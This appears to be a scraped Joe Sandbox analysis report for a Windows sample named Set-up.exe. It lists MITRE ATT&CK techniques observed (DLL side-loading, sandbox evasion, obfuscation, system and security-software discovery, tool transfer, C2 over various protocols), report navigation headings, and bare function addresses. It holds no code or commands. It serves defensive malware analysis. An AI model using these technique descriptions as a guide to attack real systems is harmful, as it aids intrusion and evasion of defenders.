Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

Windows Analysis Report
Set-up.exe

Function 008029FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Function 0080255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282
filestringCOMMON

Function 00B98D8A Relevance: 45.6, APIs: 16, Strings: 10, Instructions: 134
filelibraryloaderCOMMON

Function 008CAA30 Relevance: 19.9, APIs: 13, Instructions: 364
networkCOMMON

Function 0080116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 00B88E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 00C90730 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Function 008105B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369
networkCOMMON

Function 008C9740 Relevance: 34.0, APIs: 12, Strings: 7, Instructions: 736
registrystringCOMMON

Function 00802F17 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 144
registryCOMMON

Function 009DE5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Function 00838B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Function 008076A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69
networkCOMMON

Function 009847B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Function 008031D7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73
processCOMMON